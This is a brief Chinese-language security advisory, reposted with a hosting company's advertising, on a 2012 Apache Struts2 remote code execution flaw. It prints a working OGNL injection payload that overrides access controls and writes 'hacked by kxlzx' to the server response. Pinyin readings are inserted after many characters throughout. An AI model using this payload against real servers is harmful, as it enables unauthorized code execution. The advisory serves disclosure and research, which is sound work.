Apache Struts2 Skill名稱遠(yuǎn)程代碼執(zhí)行漏洞 |
發(fā)布時(shí)間: 2012/9/8 16:12:59 |
發(fā)布日期:2012-08-23 受影響系統(tǒng): - Apache Struts是一款開發(fā)Java Web應(yīng)用程序的開源Web應(yīng)用框架。 Apache Struts在實(shí)現(xiàn)上存在安全漏洞,攻擊者可利用此漏洞在網(wǎng)絡(luò)服務(wù)器進(jìn)程中運(yùn)行上傳的腳本代碼,導(dǎo)致非法訪問或權(quán)限提升。 <*來源:kxlzx 測試方法: 警 告 以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)! kxlzx ()提供了如下測試方法: %{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())} 建議: Apache Group
本文出自:億恩科技【mszdt.com】 服務(wù)器租用/服務(wù)器托管中國五強(qiáng)!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM] |